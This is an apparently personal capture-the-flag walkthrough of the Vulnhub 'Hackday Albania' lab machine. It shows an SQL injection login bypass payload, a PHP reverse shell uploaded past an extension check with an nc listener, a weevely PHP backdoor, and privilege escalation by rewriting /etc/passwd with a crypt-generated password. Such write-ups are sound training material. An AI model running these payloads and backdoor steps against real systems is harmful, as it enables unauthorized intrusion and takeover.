Vulnhub Hackday Albania
Vulnhub Hackday Albania
Enumeration
Like always, we start off the game with an general nmap scan.
nmap -vv -Pn -A -sC -sS -T 4 -p- 192.168.1.131
There seem to only be two ports open 22 and 8008 which is running Apache 2.4.18
Apache
Let’s investigate the website.
We saw that there’s a robots.txt with our nmap scan.
When we log into the website that’s a window saying
-> Ne qofte se jam UNE, e di se ku te shkoj ;)
Using google translate we end up with
-> If I am UNE, I know where to go;)
It doesn’t tell us much.
Source code
While looking at the source code, we can notice that there’s a comment near the end of the page saying
O ok, por jo ketu :)
That translate into
Ok ok, but not here :)
Once again we’re not getting much.
Let’s switch to the robots.txt
Robots.txt
If we go to the page 192.168.1.149:8008/robots.txt, we get to see this text
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/
And if we try one to append a line to the url we get an image.
Since there’s a lot of line, we’ll write a script to crawl through the page and
download whatever there’s inside.
By doing a simple curl thru all the folder i found one that had a message
instead of a image.
IS there any /vulnbank/ in there ???
I tried 192.168.1.149:8008/vulnbank/ but it didn’t work.
I then tried to append it to the page where i found the message
http://192.168.1.149:8008/unisxcudkqjydw/vulnbank/
We’re getting somewhere, we got a directory listing with a client folder that
leads into a “Very secure bank”
SQli
We got a username and password input box, looks like we’re going to need to sql injection our way through.
After trying for more than one hour i decided to use burp intruder to do my job.
Using burp intruder and a list found on this github -> https://github.com/1N3/IntruderPayloads we found one winning combination out of 240 try.
‘ OR ‘p’=’p’ #;
Will bypass the login.
Account
We’re inside the account and there’s an upload button.
We’re going to try to upload the php reverse shell.
After our first try, we can see that the website verifies the extension of the file.
Second try we’ll just rename it and .jpg and it goes thru.
I’ll setup nc
to listen for the incoming connection
nc -lv 1234
We load the page and boom! We got a reverse shell.
Privilege Escation
We’re inside the system, now we need to get to root.
First things first.
uname -a
linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64
x86_64 x86_64 GNU/Linux
We’re dealing with a kernel 4.4.0 this could still be vulnerable to dirty cow? And …. nop
Let’s see which OS it’s running
cat /etc/lsb-re*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION=“Ubuntu 16.04.1 LTS”
We got something pretty recent.
Enumeration
After spend a couple of hours looking at the services and libraries, i was
still not able to elevate my privileges.
I tried a bunch of exploits that either crash the machine or just did nothing.
Only having a reverse shell was quite annoying because you couldn’t go back to
get a command you typed a while ago.
So after googling a bit i found weevely. What a beautiful tool.
It let’s us create a backdoor in php and upload it directly on the server.
Weevely
We need to create the backdoor.
weevely generate toor me.php
This will create the backdoor with the password toor.
Once that is done with got to upload it in a folder where we can access it from outside.
In our case we need to put the file in the same directory where we upload our
jpg in the previous steps.
By doing a quick find on the jpg file that we uploaded we see that the
directory is /var/www/html/unisxcudkqjydw/vulnbank/client/upload
We can either do a wget the file directly from the kali machine by hosting a
http server using python -m SimpleHTTPServer
or using nc or one of the
multiple way available.
Once the backdoor is in, we can go back to our kali machine and use the following command to establish the connection
weevely http://192.168.1.149:8008/unisxcudkqjydw/vulnbank/client/upload/me.php toor
Where me.php is the backdoor and toor is the password.
We now have a shell that will allow us to have more function that the basic reverse shell.
Weevely is love
Weevely has a bunch of commands that does stuff for us. :help will show them.
In our case one command will show us a way to obtain root.
:audit_filesystem
If we look at the result we can see that in the /etc/ folder the file passwd
is
writeable. There’s our door.
Weevely is life
In our simple reverse shell we couldn’t use vim correctly. Weevely fixes that.
What we need to do is change the password of the users that we want.
In our previous enumeration i noticed that in the home directory of the user
taviso, he had the file sudo_as_admin_successful.
That means that he has sudo rights as admin. So i’ll be changing the password
of taviso to whatver i want.
We can replace the second field in passwd by a password, but the password needs to be crypted. Perl will allow us to generate the crypted password
perl -le ’print crypt(”foo”, ”aa”)’
aaKNIEDOaueR6
Where foo is the new password.
We edit the /etc/passwd file
vi /etc/passwd
taviso:aaKNIEDOaueR6:1000:1000:Taviso,,,:/home/taviso:/bin/bash
I tried using su to switch user but it was not available. Let’s just try to ssh into the machine directly.
SSH
We can ssh directly as taviso
And we’re in!
Let’s see our sudo rights
sudo -l
Matching Defaults entries for taviso on hackday:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User taviso may run the following commands on hackday:
(ALL : ALL) ALL
ALL : ALL ALL
That’s good game.
We got all the rights.
sudo passwd root
su root
Changing root password and switching into him.
GG